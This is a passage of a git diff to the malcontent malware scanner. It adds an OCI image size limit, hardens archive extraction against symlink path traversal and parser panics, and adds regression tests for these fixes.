diff --git a/README.md b/README.md index 8082fcb6e..174eb3dc4 100644 --- a/README.md +++ b/README.md @@ -64,8 +64,9 @@ GLOBAL OPTIONS: --ignore-tags string Rule tags to ignore (default: "false_positive,ignore") --include-data-files Include files that are detected as non-program (binary or source) files --jobs int, -j int Concurrently scan files within target scan paths (default: 12) - --max-depth int Maximum depth for archive extraction (-1 for unlimited) (default: 32) - --max-files int Maximum number of files to scan (-1 for unlimited) (default: 2097152) + --max-depth int Maximum depth for archive extraction (0 or -1 for unlimited) (default: 32) + --max-files int Maximum number of files to scan (0 or -1 for unlimited) (default: 2097152) + --max-image-size int Maximum OCI image size in bytes (0 or -1 for unlimited) (default: 17179869184) --min-file-level int Obsoleted by --min-file-risk (default: -1) --min-file-risk string Only show results for files which meet the given risk level (any, low, medium, high, critical) (default: "low") --min-level int Obsoleted by --min-risk (default: -1) diff --git a/cmd/mal/mal.go b/cmd/mal/mal.go index a257da8bb..0f7cf630f 100644 --- a/cmd/mal/mal.go +++ b/cmd/mal/mal.go @@ -61,6 +61,7 @@ var ( ignoreTagsFlag string includeDataFilesFlag bool maxDepthFlag int + maxImageSizeFlag int64 maxScanFilesFlag int minFileLevelFlag int minFileRiskFlag string @@ -261,6 +262,7 @@ func main() { IgnoreTags: ignoreTags, IncludeDataFiles: includeDataFiles, MaxDepth: maxDepthFlag, + MaxImageSize: maxImageSizeFlag, MaxScanFiles: maxScanFilesFlag, MinFileRisk: minFileRisk, MinRisk: minRisk, @@ -348,17 +350,24 @@ func main() { &cli.IntFlag{ Name: "max-depth", Value: 32, - Usage: "Maximum depth for archive extraction (-1 for unlimited)", + Usage: "Maximum depth for archive extraction (0 or -1 for unlimited)", Destination: &maxDepthFlag, Local: false, }, &cli.IntFlag{ Name: "max-files", Value: 1 << 21, // ~2 million files - Usage: "Maximum number of files to scan (-1 for unlimited)", + Usage: "Maximum number of files to scan (0 or -1 for unlimited)", Destination: &maxScanFilesFlag, Local: false, }, + &cli.Int64Flag{ + Name: "max-image-size", + Value: 1 << 34, // ~16 GB + Usage: "Maximum OCI image size in bytes (0 or -1 for unlimited)", + Destination: &maxImageSizeFlag, + Local: false, + }, &cli.IntFlag{ Name: "min-file-level", Value: -1, diff --git a/pkg/action/archive_test.go b/pkg/action/archive_test.go index 8f06951ae..f729d70d8 100644 --- a/pkg/action/archive_test.go +++ b/pkg/action/archive_test.go @@ -15,6 +15,7 @@ import ( "github.com/chainguard-dev/clog" "github.com/chainguard-dev/malcontent/pkg/archive" + "github.com/chainguard-dev/malcontent/pkg/file" "github.com/chainguard-dev/malcontent/pkg/malcontent" "github.com/chainguard-dev/malcontent/pkg/render" "github.com/chainguard-dev/malcontent/rules" @@ -22,6 +23,22 @@ import ( "github.com/google/go-cmp/cmp" ) +// readTestFile reads a file using file.GetContents for consistency with production code. +func readTestFile(t *testing.T, path string) []byte { + t.Helper() + f, err := os.Open(path) + if err != nil { + t.Fatalf("failed to open test file %s: %v", path, err) + } + defer f.Close() + buf := make([]byte, file.ExtractBuffer) + data, err := file.GetContents(f, buf) + if err != nil { + t.Fatalf("failed to read test file %s: %v", path, err) + } + return data +} + func TestExtractionMethod(t *testing.T) { tests := []struct { name string @@ -256,10 +273,7 @@ func TestScanArchive(t *testing.T) { got := out.String() - td, err := os.ReadFile("testdata/scan_archive") - if err != nil { - t.Fatalf("testdata read failed: %v", err) - } + td := readTestFile(t, "testdata/scan_archive") want := string(td) if diff := cmp.Diff(want, got); diff != "" { @@ -303,10 +317,7 @@ func TestScanDeb(t *testing.T) { got := out.String() - td, err := os.ReadFile("testdata/scan_deb") - if err != nil { - t.Fatalf("testdata read failed: %v", err) - } + td := readTestFile(t, "testdata/scan_deb") want := string(td) if diff := cmp.Diff(want, got); diff != "" { @@ -350,10 +361,7 @@ func TestScanRPM(t *testing.T) { got := out.String() - td, err := os.ReadFile("testdata/scan_rpm") - if err != nil { - t.Fatalf("testdata read failed: %v", err) - } + td := readTestFile(t, "testdata/scan_rpm") want := string(td) if diff := cmp.Diff(want, got); diff != "" { @@ -397,10 +405,7 @@ func TestScanZlib(t *testing.T) { got := out.String() - td, err := os.ReadFile("testdata/scan_zlib") - if err != nil { - t.Fatalf("testdata read failed: %v", err) - } + td := readTestFile(t, "testdata/scan_zlib") want := string(td) if diff := cmp.Diff(want, got); diff != "" { @@ -444,10 +449,7 @@ func TestScanZstd(t *testing.T) { got := out.String() - td, err := os.ReadFile("testdata/scan_zstd") - if err != nil { - t.Fatalf("testdata read failed: %v", err) - } + td := readTestFile(t, "testdata/scan_zstd") want := string(td) if diff := cmp.Diff(want, got); diff != "" { @@ -582,10 +584,7 @@ func TestScanConflictingArchiveFiles(t *testing.T) { } got := out.String() - td, err := os.ReadFile("testdata/scan_conflict") - if err != nil { - t.Fatalf("testdata read failed: %v", err) - } + td := readTestFile(t, "testdata/scan_conflict") want := string(td) if diff := cmp.Diff(want, got); diff != "" { diff --git a/pkg/action/diff.go b/pkg/action/diff.go index ddc337e61..b15d6b671 100644 --- a/pkg/action/diff.go +++ b/pkg/action/diff.go @@ -221,11 +221,11 @@ func Diff(ctx context.Context, c malcontent.Config, _ *clog.Logger) (*malcontent ) if c.OCI { - srcPath, err = archive.OCI(ctx, srcPath, c.OCIAuth) + srcPath, err = archive.OCI(ctx, srcPath, c.OCIAuth, c.MaxImageSize) if err != nil { return nil, fmt.Errorf("failed to prepare scan path: %w", err) } - destPath, err = archive.OCI(ctx, destPath, c.OCIAuth) + destPath, err = archive.OCI(ctx, destPath, c.OCIAuth, c.MaxImageSize) if err != nil { return nil, fmt.Errorf("failed to prepare scan path: %w", err) } diff --git a/pkg/action/oci_test.go b/pkg/action/oci_test.go index d85589b36..dfe450415 100644 --- a/pkg/action/oci_test.go +++ b/pkg/action/oci_test.go @@ -7,7 +7,6 @@ import ( "bytes" "context" "io/fs" - "os" "runtime" "testing" @@ -55,10 +54,7 @@ func TestOCI(t *testing.T) { got := out.String() - td, err := os.ReadFile("testdata/scan_oci") - if err != nil { - t.Fatalf("testdata read failed: %v", err) - } + td := readTestFile(t, "testdata/scan_oci") want := string(td) if diff := cmp.Diff(want, got); diff != "" { diff --git a/pkg/action/scan.go b/pkg/action/scan.go index a9105fb98..04e211bc4 100644 --- a/pkg/action/scan.go +++ b/pkg/action/scan.go @@ -355,7 +355,7 @@ func handleScanPath(ctx context.Context, scanPath string, c malcontent.Config, r c.Renderer.Scanning(ctx, scanPath) } - scanInfo, err := prepareScanPath(ctx, scanPath, c.OCI, c.OCIAuth, logger) + scanInfo, err := prepareScanPath(ctx, scanPath, c.OCI, c.OCIAuth, c.MaxImageSize, logger) if err != nil { return fmt.Errorf("failed to prepare scan path: %w", err) } @@ -376,7 +376,7 @@ func handleScanPath(ctx context.Context, scanPath string, c malcontent.Config, r return processPaths(ctx, paths, scanInfo, c, r, matchChan, matchOnce, logger) } -func prepareScanPath(ctx context.Context, scanPath string, isOCI, useAuth bool, logger *clog.Logger) (scanPathInfo, error) { +func prepareScanPath(ctx context.Context, scanPath string, isOCI, useAuth bool, maxImageSize int64, logger *clog.Logger) (scanPathInfo, error) { if ctx.Err() != nil { return scanPathInfo{}, ctx.Err() } @@ -391,7 +391,7 @@ func prepareScanPath(ctx context.Context, scanPath string, isOCI, useAuth bool, } info.imageURI = scanPath - ociPath, err := archive.OCI(ctx, info.imageURI, useAuth) + ociPath, err := archive.OCI(ctx, info.imageURI, useAuth, maxImageSize) if err != nil { return info, fmt.Errorf("failed to prepare OCI image for scanning: %w", err) } diff --git a/pkg/archive/archive.go b/pkg/archive/archive.go index e581b8ddb..27765388b 100644 --- a/pkg/archive/archive.go +++ b/pkg/archive/archive.go @@ -15,7 +15,6 @@ import ( "runtime" "strings" "sync" - "time" "github.com/chainguard-dev/clog" "github.com/chainguard-dev/malcontent/pkg/file" @@ -33,6 +32,34 @@ func init() { zipPool = pool.NewBufferPool(runtime.GOMAXPROCS(0) * 2) } +// ValidateResolvedPath checks that the target path still resides within the extraction directory +// after resolving symlinks in its parent directory. +func ValidateResolvedPath(target, dir, clean string) error { + resolvedParent, ok := evalSymlinks(filepath.Dir(target)) + if !ok { + return nil + } + resolvedDir, ok := evalSymlinks(dir) + if !ok { + return nil + } + resolvedTarget := filepath.Join(resolvedParent, filepath.Base(target)) + if !IsValidPath(resolvedTarget, resolvedDir) { + return fmt.Errorf("path traversal via symlink in parent directory: %s", clean) + } + return nil +} + +// evalSymlinks resolves symlinks in the given path, returning the resolved path +// and true on success, or an empty string and false if resolution fails. +func evalSymlinks(path string) (string, bool) { + resolved, err := filepath.EvalSymlinks(path) + if err != nil { + return "", false + } + return resolved, true +} + // isValidPath checks if the target file is within the given directory. func IsValidPath(target, dir string) bool { if strings.Contains(target, "\x00") || strings.Contains(dir, "\x00") { @@ -137,13 +164,15 @@ func extractNestedArchive(ctx context.Context, c malcontent.Config, d string, f // Some packages may have archives and files with colliding names // e.g., demo_page.css and demo_page.css.gz // the former is the uncompressed version of the latter - // if we encounter this, replace the name with something that won't collide + // if we encounter this, use os.MkdirTemp to create a unique directory if _, err := os.Stat(archivePath); err == nil { logger.Debugf("duplicate file name already exists, modifying directory name for %s", archivePath) - archivePath = fmt.Sprintf("%s%d", archivePath, time.Now().UnixNano()) - } - - if err := os.MkdirAll(archivePath, 0o700); err != nil { + var mkErr error + archivePath, mkErr = os.MkdirTemp(filepath.Dir(archivePath), filepath.Base(archivePath)+"_*") + if mkErr != nil { + return fmt.Errorf("failed to create unique extraction directory: %w", mkErr) + } + } else if err := os.MkdirAll(archivePath, 0o700); err != nil { return fmt.Errorf("failed to create extraction directory: %w", err) } @@ -331,9 +360,19 @@ func handleSymlink(dir, linkPath, linkTarget string) error { return nil } + parentDir := filepath.Dir(fullPath) + resolvedDir := dir + if rp, err := filepath.EvalSymlinks(parentDir); err == nil { + parentDir = rp + if rd, err := filepath.EvalSymlinks(dir); err == nil { + resolvedDir = rd + } + } + // Validate relative symlink target resolves within extraction directory - resolvedTarget := filepath.Clean(filepath.Join(filepath.Dir(fullPath), linkTarget)) - if !IsValidPath(resolvedTarget, dir) { + // using the actual (resolved) parent directory + resolvedTarget := filepath.Clean(filepath.Join(parentDir, linkTarget)) + if !IsValidPath(resolvedTarget, resolvedDir) { return fmt.Errorf("symlink target escapes extraction directory: %s -> %s", linkPath, linkTarget) } @@ -363,8 +402,9 @@ func handleSymlink(dir, linkPath, linkTarget string) error { return fmt.Errorf("symlink target mismatch: expected %s, got %s", linkTarget, actualTarget) } - actualResolved := filepath.Clean(filepath.Join(filepath.Dir(fullPath), actualTarget)) - if !IsValidPath(actualResolved, dir) { + // Post-creation validation using the resolved parent directory + actualResolved := filepath.Clean(filepath.Join(parentDir, actualTarget)) + if !IsValidPath(actualResolved, resolvedDir) { os.Remove(fullPath) return fmt.Errorf("symlink target escapes extraction directory after creation: %s -> %s", linkPath, actualTarget) } diff --git a/pkg/archive/bz2.go b/pkg/archive/bz2.go index 6d31aed7f..5c31c0bb8 100644 --- a/pkg/archive/bz2.go +++ b/pkg/archive/bz2.go @@ -61,8 +61,6 @@ func ExtractBz2(ctx context.Context, d, f string) error { return fmt.Errorf("failed to create directory for file: %w", err) } - // #nosec G115 // ignore Type conversion which leads to integer overflow - // header.Mode is int64 and FileMode is uint32 out, err := os.OpenFile(target, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600) if err != nil { return fmt.Errorf("failed to create file: %w", err) diff --git a/pkg/archive/deb.go b/pkg/archive/deb.go index 4902fafd9..3759b3576 100644 --- a/pkg/archive/deb.go +++ b/pkg/archive/deb.go @@ -18,7 +18,13 @@ import ( ) // ExtractDeb extracts .deb packages. -func ExtractDeb(ctx context.Context, d, f string) error { +func ExtractDeb(ctx context.Context, d, f string) (retErr error) { + // Recover from panics in third-party deb parsing library. + defer func() { + if r := recover(); r != nil { + retErr = fmt.Errorf("recovered from panic during deb extraction: %v", r) + } + }() if ctx.Err() != nil { return ctx.Err() } @@ -57,6 +63,10 @@ func ExtractDeb(ctx context.Context, d, f string) error { return fmt.Errorf("invalid file path: %s", target) } + if err := ValidateResolvedPath(target, d, clean); err != nil { + return err + } + switch header.Typeflag { case tar.TypeDir: if err := handleDirectory(target); err != nil { diff --git a/pkg/archive/fuzz_test.go b/pkg/archive/fuzz_test.go index 6cda60335..f65f4ca5e 100644 --- a/pkg/archive/fuzz_test.go +++ b/pkg/archive/fuzz_test.go @@ -4,6 +4,7 @@ package archive import ( + "bytes" "context" "os" "path/filepath" @@ -11,10 +12,22 @@ import ( "testing" "time" + "github.com/chainguard-dev/malcontent/pkg/file" "github.com/chainguard-dev/malcontent/pkg/malcontent" "github.com/chainguard-dev/malcontent/pkg/programkind" ) +// readTestFile reads a file using file.GetContents for consistency with production code. +func readTestFile(path string) ([]byte, error) { + f, err := os.Open(path) + if err != nil { + return nil, err + } + defer f.Close() + buf := make([]byte, file.ExtractBuffer) + return file.GetContents(f, buf) +} + // FuzzExtractTar tests tar extraction with random inputs to find crashes, // path traversal vulnerabilities, and other issues. func FuzzExtractTar(f *testing.F) { @@ -29,7 +42,7 @@ func FuzzExtractTar(f *testing.F) { } for _, td := range testdata { - if data, err := os.ReadFile(td); err == nil { + if data, err := readTestFile(td); err == nil { f.Add(data) } } @@ -84,7 +97,7 @@ func FuzzExtractZip(f *testing.F) { } for _, td := range testdata { - if data, err := os.ReadFile(td); err == nil { + if data, err := readTestFile(td); err == nil { f.Add(data) } } @@ -151,7 +164,7 @@ func FuzzExtractArchive(f *testing.F) { } for _, td := range testdata { - if data, err := os.ReadFile(td); err == nil { + if data, err := readTestFile(td); err == nil { switch { case strings.HasSuffix(td, ".tar.gz"): f.Add(data, ".tar.gz") @@ -269,7 +282,7 @@ func FuzzExtractGzip(f *testing.F) { } for _, td := range testdata { - if data, err := os.ReadFile(td); err == nil { + if data, err := readTestFile(td); err == nil { f.Add(data) } } @@ -366,7 +379,7 @@ func FuzzExtractZstd(f *testing.F) { } for _, td := range testdata { - if data, err := os.ReadFile(td); err == nil { + if data, err := readTestFile(td); err == nil { f.Add(data) } } @@ -418,7 +431,7 @@ func FuzzExtractZlib(f *testing.F) { } for _, td := range testdata { - if data, err := os.ReadFile(td); err == nil { + if data, err := readTestFile(td); err == nil { f.Add(data) } } @@ -472,16 +485,22 @@ func FuzzExtractRPM(f *testing.F) { } for _, td := range testdata { - if data, err := os.ReadFile(td); err == nil { + if data, err := readTestFile(td); err == nil { f.Add(data) } } - f.Add([]byte{}) // empty - f.Add([]byte{0xed, 0xab, 0xee, 0xdb}) // rpm magic - f.Add([]byte("not rpm")) // invalid + rpmMagic := []byte{0xed, 0xab, 0xee, 0xdb} + + f.Add([]byte{}) // empty + f.Add(rpmMagic) // rpm magic + f.Add([]byte("not rpm")) // invalid f.Fuzz(func(t *testing.T, data []byte) { + if len(data) < 96 || !bytes.Equal(data[:4], rpmMagic) { + return + } + tmpFile, err := os.CreateTemp("", "fuzz-rpm-*.rpm") if err != nil { t.Skip() @@ -523,7 +542,7 @@ func FuzzExtractDeb(f *testing.F) { } for _, td := range testdata { - if data, err := os.ReadFile(td); err == nil { + if data, err := readTestFile(td); err == nil { f.Add(data) } } diff --git a/pkg/archive/gzip.go b/pkg/archive/gzip.go index 63eb81fbb..f62d2c6e1 100644 --- a/pkg/archive/gzip.go +++ b/pkg/archive/gzip.go @@ -78,7 +78,7 @@ func ExtractGzip(ctx context.Context, d string, f string) error { } defer gr.Close() - out, err := os.Create(target) + out, err := os.OpenFile(target, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600) if err != nil { return fmt.Errorf("failed to create extracted file: %w", err) } diff --git a/pkg/archive/oci.go b/pkg/archive/oci.go index c08ada7ee..a08df49de 100644 --- a/pkg/archive/oci.go +++ b/pkg/archive/oci.go @@ -16,7 +16,21 @@ import ( v1 "github.com/google/go-containerregistry/pkg/v1" ) -func prepareImage(ctx context.Context, d string, useAuth bool) (string, *os.File, error) { +// limitedWriter wraps a writer and returns an error if the total bytes written exceeds a limit. +type limitedWriter struct { + w io.Writer + remaining int64 +} + +func (lw *limitedWriter) Write(p []byte) (int, error) { + if int64(len(p)) > lw.remaining { + return 0, fmt.Errorf("export size exceeds maximum allowed size") + } + lw.remaining -= int64(len(p)) + return lw.w.Write(p) +} + +func prepareImage(ctx context.Context, d string, useAuth bool, maxImageSize int64) (string, *os.File, error) { if ctx.Err() != nil { return "", nil, ctx.Err() } @@ -28,6 +42,14 @@ func prepareImage(ctx context.Context, d string, useAuth bool) (string, *os.File return "", nil, fmt.Errorf("failed to create temp dir: %w", err) } + // Clean up tmpDir on any error after this point + success := false + defer func() { + if !success { + os.RemoveAll(tmpDir) + } + }() + tmpFile, err := os.CreateTemp(tmpDir, fmt.Sprintf("%s.tar", filepath.Base(d))) if err != nil { return "", nil, fmt.Errorf("failed to create temp file: %w", err) @@ -47,24 +69,51 @@ func prepareImage(ctx context.Context, d string, useAuth bool) (string, *os.File if image, err = crane.Pull(d, opts...); err != nil { return "", nil, fmt.Errorf("failed to pull image: %w", err) } - if err := crane.Export(image, tmpFile); err != nil { + + // Enforce maximum image size if configured (0 or negative means unlimited) + if maxImageSize > 0 { + manifest, err := image.Manifest() + if err != nil { + return "", nil, fmt.Errorf("failed to read image manifest: %w", err) + } + var totalSize int64 + for _, layer := range manifest.Layers { + totalSize += layer.Size + } + totalSize += manifest.Config.Size + if totalSize > maxImageSize { + return "", nil, fmt.Errorf("image size (%d bytes) exceeds maximum allowed size (%d bytes)", totalSize, maxImageSize) + } + } + + // Use a size-limiting writer to enforce maxImageSize on the uncompressed export. + // The manifest check above uses compressed sizes, which can be much smaller. + var exportWriter io.Writer = tmpFile + if maxImageSize > 0 { + exportWriter = &limitedWriter{w: tmpFile, remaining: maxImageSize} + } + if err := crane.Export(image, exportWriter); err != nil { return "", nil, fmt.Errorf("failed to export image: %w", err) } _, err = tmpFile.Seek(0, io.SeekStart) if err != nil { return "", nil, fmt.Errorf("failed to seek to start of temp file: %w", err) } + + success = true return tmpDir, tmpFile, nil } // OCI returns a directory with the extracted image directories/files in it. -func OCI(ctx context.Context, path string, useAuth bool) (string, error) { - tmpDir, tmpFile, err := prepareImage(ctx, path, useAuth) +func OCI(ctx context.Context, path string, useAuth bool, maxImageSize int64) (string, error) { + tmpDir, tmpFile, err := prepareImage(ctx, path, useAuth, maxImageSize) if err != nil { return "", fmt.Errorf("failed to prepare image: %w", err) } + defer tmpFile.Close() if err := ExtractTar(ctx, tmpDir, tmpFile.Name()); err != nil { + os.RemoveAll(tmpDir) return "", fmt.Errorf("extract image: %w", err) } // remove the temporary tarball after we extract it diff --git a/pkg/archive/rpm.go b/pkg/archive/rpm.go index a3b48ef78..c77ed6d0c 100644 --- a/pkg/archive/rpm.go +++ b/pkg/archive/rpm.go @@ -63,7 +63,13 @@ func extractFileFromCPIO(ctx context.Context, cr *cpio.Reader, target string, bu } // extractRPM extracts .rpm packages. -func ExtractRPM(ctx context.Context, d, f string) error { +func ExtractRPM(ctx context.Context, d, f string) (retErr error) { + // Recover from panics in third-party RPM parsing library (cavaliergopher/rpm). + defer func() { + if r := recover(); r != nil { + retErr = fmt.Errorf("recovered from panic during RPM extraction: %v", r) + } + }() if ctx.Err() != nil { return ctx.Err() } @@ -153,6 +159,10 @@ func ExtractRPM(ctx context.Context, d, f string) error { return fmt.Errorf("invalid file path: %s", target) } + if err := ValidateResolvedPath(target, d, clean); err != nil { + return err + } + // https://github.com/cavaliergopher/cpio/blob/main/header.go#L24 const modeTypeMask = 0o170000 fileType := header.Mode & modeTypeMask diff --git a/pkg/archive/symlink_test.go b/pkg/archive/symlink_test.go index 70abc8e0f..7d272388b 100644 --- a/pkg/archive/symlink_test.go +++ b/pkg/archive/symlink_test.go @@ -7,7 +7,11 @@ import ( "context" "os" "path/filepath" + "sync" "testing" + + "github.com/chainguard-dev/clog" + "github.com/chainguard-dev/malcontent/pkg/malcontent" ) func TestSymlinkExtraction(t *testing.T) { @@ -55,6 +59,142 @@ func TestSymlinkExtraction(t *testing.T) { } } +func TestValidateResolvedPath(t *testing.T) { + t.Parallel() + tmpDir, err := os.MkdirTemp("", "validate-resolved-*") + if err != nil { + t.Fatalf("failed to create temp dir: %v", err) + } + defer os.RemoveAll(tmpDir) + + // Create a subdirectory and a file inside the temp dir + subDir := filepath.Join(tmpDir, "subdir") + if err := os.MkdirAll(subDir, 0o700); err != nil { + t.Fatalf("failed to create subdir: %v", err) + } + if err := os.WriteFile(filepath.Join(subDir, "file.txt"), []byte("test"), 0o600); err != nil { + t.Fatalf("failed to create file: %v", err) + } + + // A normal file path within the extraction dir should pass + target := filepath.Join(subDir, "file.txt") + if err := ValidateResolvedPath(target, tmpDir, "subdir/file.txt"); err != nil { + t.Errorf("expected no error for valid path, got: %v", err) + } + + // Create a symlink that points outside the extraction directory + escapingLink := filepath.Join(tmpDir, "escape") + if err := os.Symlink("/tmp", escapingLink); err != nil { + t.Fatalf("failed to create escaping symlink: %v", err) + } + + // A path whose parent resolves outside the dir should fail + targetViaEscape := filepath.Join(escapingLink, "somefile") + if err := ValidateResolvedPath(targetViaEscape, tmpDir, "escape/somefile"); err == nil { + t.Error("expected error for path traversal via symlink, got nil") + } + + // Create a symlink that points to a directory within the extraction dir + internalLink := filepath.Join(tmpDir, "internal_link") + if err := os.Symlink(subDir, internalLink); err != nil { + t.Fatalf("failed to create internal symlink: %v", err) + } + + // A path whose parent resolves within the dir should pass + targetViaInternal := filepath.Join(internalLink, "file.txt") + if err := ValidateResolvedPath(targetViaInternal, tmpDir, "internal_link/file.txt"); err != nil { + t.Errorf("expected no error for valid symlink path, got: %v", err) + } + + // A path with a nonexistent parent should pass (EvalSymlinks fails, returns nil) + nonexistent := filepath.Join(tmpDir, "nonexistent", "file.txt") + if err := ValidateResolvedPath(nonexistent, tmpDir, "nonexistent/file.txt"); err != nil { + t.Errorf("expected no error for nonexistent parent, got: %v", err) + } +} + +// TestExtractNestedArchiveWithSubdirectory verifies that extractNestedArchive +// handles archives located in subdirectories (where the relative path contains +// path separators). This is a regression test for a bug where os.MkdirTemp +// was called with a pattern containing path separators, which is not allowed. +func TestExtractNestedArchiveWithSubdirectory(t *testing.T) { + t.Parallel() + + tmpDir, err := os.MkdirTemp("", "nested-archive-test-*") + if err != nil { + t.Fatalf("failed to create temp dir: %v", err) + } + defer os.RemoveAll(tmpDir) + + // Create a nested archive inside a subdirectory, simulating what happens + // when an archive contains another archive at a path like "subdir/inner.tar.gz" + subDir := filepath.Join(tmpDir, "subdir") + if err := os.MkdirAll(subDir, 0o700); err != nil { + t.Fatalf("failed to create subdir: %v", err) + } + + // Copy a real .gz test file into the subdirectory + srcData, err := os.ReadFile("../../pkg/action/testdata/apko.gz") + if err != nil { + t.Fatalf("failed to read test archive: %v", err) + } + nestedArchive := filepath.Join(subDir, "apko.gz") + if err := os.WriteFile(nestedArchive, srcData, 0o600); err != nil { + t.Fatalf("failed to write nested archive: %v", err) + } + + ctx := context.Background() + logger := clog.FromContext(ctx) + cfg := malcontent.Config{} + var extracted sync.Map + + // This is the call that previously failed with "pattern contains path separator" + err = extractNestedArchive(ctx, cfg, tmpDir, "subdir/apko.gz", &extracted, logger, 1) + if err != nil { + t.Fatalf("extractNestedArchive failed: %v", err) + } +} + +// TestExtractNestedArchiveCollision verifies that extractNestedArchive handles +// name collisions by falling back to os.MkdirTemp when the deterministic path +// already exists. +func TestExtractNestedArchiveCollision(t *testing.T) { + t.Parallel() + + tmpDir, err := os.MkdirTemp("", "nested-collision-test-*") + if err != nil { + t.Fatalf("failed to create temp dir: %v", err) + } + defer os.RemoveAll(tmpDir) + + // Create a file that will collide with the extraction directory name. + // When extracting "apko.gz", the extraction dir would be "apko" — create + // that as a file first to force the collision path. + collisionPath := filepath.Join(tmpDir, "apko") + if err := os.WriteFile(collisionPath, []byte("existing"), 0o600); err != nil { + t.Fatalf("failed to create collision file: %v", err) + } + + srcData, err := os.ReadFile("../../pkg/action/testdata/apko.gz") + if err != nil { + t.Fatalf("failed to read test archive: %v", err) + } + archivePath := filepath.Join(tmpDir, "apko.gz") + if err := os.WriteFile(archivePath, srcData, 0o600); err != nil { + t.Fatalf("failed to write archive: %v", err) + } + + ctx := context.Background() + logger := clog.FromContext(ctx) + cfg := malcontent.Config{} + var extracted sync.Map + + err = extractNestedArchive(ctx, cfg, tmpDir, "apko.gz", &extracted, logger, 1) + if err != nil { + t.Fatalf("extractNestedArchive with collision failed: %v", err) + } +} + func TestHandleSymlink(t *testing.T) { t.Parallel() tmpDir, err := os.MkdirTemp("", "symlink-test-*") diff --git a/pkg/archive/tar.go b/pkg/archive/tar.go index f9e509e7c..ef37940c5 100644 --- a/pkg/archive/tar.go +++ b/pkg/archive/tar.go @@ -86,7 +86,7 @@ func ExtractTar(ctx context.Context, d string, f string) error { if err != nil { return fmt.Errorf("failed to create xz reader: %w", err) } - uncompressed := strings.Trim(filepath.Base(f), ".xz") + uncompressed := strings.TrimSuffix(filepath.Base(f), ".xz") target := filepath.Join(d, filepath.Base(filepath.Dir(f)), uncompressed) if err := os.MkdirAll(filepath.Dir(target), 0o700); err != nil { return fmt.Errorf("failed to create directory for file: %w", err) @@ -126,7 +126,7 @@ func ExtractTar(ctx context.Context, d string, f string) error { return nil case strings.Contains(filename, ".tar.bz2") || strings.Contains(filename, ".tbz"): br := bzip2.NewReader(ctx, tf) - uncompressed := strings.Trim(filepath.Base(f), programkind.GetExt(filename)) + uncompressed := strings.TrimSuffix(filepath.Base(f), programkind.GetExt(filename)) target := filepath.Join(d, filepath.Base(filepath.Dir(f)), uncompressed) if err := os.MkdirAll(filepath.Dir(target), 0o700); err != nil { return fmt.Errorf("failed to create directory for file: %w", err) @@ -189,6 +189,10 @@ func ExtractTar(ctx context.Context, d string, f string) error { return fmt.Errorf("invalid file path: %s", target) } + if err := ValidateResolvedPath(target, d, clean); err != nil { + return err + } + switch header.Typeflag { case tar.TypeDir: if err := handleDirectory(target); err != nil { diff --git a/pkg/archive/upx.go b/pkg/archive/upx.go index 16ab1fb46..7255e45fd 100644 --- a/pkg/archive/upx.go +++ b/pkg/archive/upx.go @@ -12,6 +12,7 @@ import ( "strings" "github.com/chainguard-dev/clog" + "github.com/chainguard-dev/malcontent/pkg/file" "github.com/chainguard-dev/malcontent/pkg/programkind" ) @@ -20,8 +21,9 @@ func ExtractUPX(ctx context.Context, d, f string) error { return ctx.Err() } - // Check if UPX is installed - if err := programkind.UPXInstalled(); err != nil { + // Check if UPX is installed and get its validated path + upxPath, err := programkind.UPXInstalled() + if err != nil { return err } @@ -29,7 +31,7 @@ func ExtractUPX(ctx context.Context, d, f string) error { logger.Debug("extracting upx") // Check if the file is valid - _, err := os.Stat(f) + _, err = os.Stat(f) if err != nil { return fmt.Errorf("failed to stat file: %w", err) } @@ -52,7 +54,16 @@ func ExtractUPX(ctx context.Context, d, f string) error { return fmt.Errorf("failed to get absolute path: %w", err) } - tf, err := os.ReadFile(f) + buf := archivePool.Get(file.ExtractBuffer) + defer archivePool.Put(buf) + + src, err := os.Open(f) + if err != nil { + return fmt.Errorf("failed to open file: %w", err) + } + defer src.Close() + + tf, err := file.GetContents(src, buf) if err != nil { return fmt.Errorf("failed to read file: %w", err) } @@ -62,16 +73,16 @@ func ExtractUPX(ctx context.Context, d, f string) error { return fmt.Errorf("failed to write file: %w", err) } - cmd := exec.CommandContext(ctx, "upx", "-d", "-k", "--", absTarget) + cmd := exec.CommandContext(ctx, upxPath, "-d", "-k", "--", absTarget) output, err := cmd.CombinedOutput() if err != nil { os.Remove(absTarget) - return fmt.Errorf("failed to decompress upx file: %w, output: %s", err, output) + return fmt.Errorf("failed to decompress upx file: %w", err) } if !strings.Contains(string(output), "Decompressed") && !strings.Contains(string(output), "Unpacked") { os.Remove(absTarget) - return fmt.Errorf("upx decompression might have failed: %s", output) + return fmt.Errorf("upx decompression might have failed") } logger.Debug("successfully decompressed upx file", "output", string(output), "target", absTarget) diff --git a/pkg/archive/zip.go b/pkg/archive/zip.go index aa0b7f3fa..c9a08de1f 100644 --- a/pkg/archive/zip.go +++ b/pkg/archive/zip.go @@ -12,7 +12,6 @@ import ( "path/filepath" "runtime" "strings" - "time" "github.com/chainguard-dev/clog" "github.com/chainguard-dev/malcontent/pkg/file" @@ -115,7 +114,13 @@ func extractFile(ctx context.Context, zf *zip.File, destDir string, logger *clog // this case insensitivity will break scans, so rename files that collide with existing directories if runtime.GOOS == "darwin" { if _, err := os.Stat(filepath.Join(destDir, zf.Name)); err == nil { - zf.Name = fmt.Sprintf("%s%d", zf.Name, time.Now().UnixNano()) + uniqueDir, mkErr := os.MkdirTemp(filepath.Join(destDir, filepath.Dir(zf.Name)), filepath.Base(zf.Name)+"_*") + if mkErr == nil { + rel, relErr := filepath.Rel(destDir, uniqueDir) + if relErr == nil { + zf.Name = rel + } + } } } @@ -131,6 +136,11 @@ func extractFile(ctx context.Context, zf *zip.File, destDir string, logger *clog return nil } + if err := ValidateResolvedPath(target, destDir, clean); err != nil { + logger.Warnf("skipping path with symlink traversal: %s", target) + return nil + } + if zf.Mode()&os.ModeSymlink != 0 { src, err := zf.Open() if err != nil { @@ -163,6 +173,11 @@ func extractFile(ctx context.Context, zf *zip.File, destDir string, logger *clog } defer src.Close() + // Verify target is not a symlink before opening (defense against TOCTOU in concurrent extraction) + if fi, err := os.Lstat(target); err == nil && fi.Mode()&os.ModeSymlink != 0 { + return fmt.Errorf("refusing to overwrite symlink at target path: %s", target) + } + dst, err := os.OpenFile(target, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600) if err != nil { return fmt.Errorf("failed to create destination file: %w", err) diff --git a/pkg/compile/compile.go b/pkg/compile/compile.go index 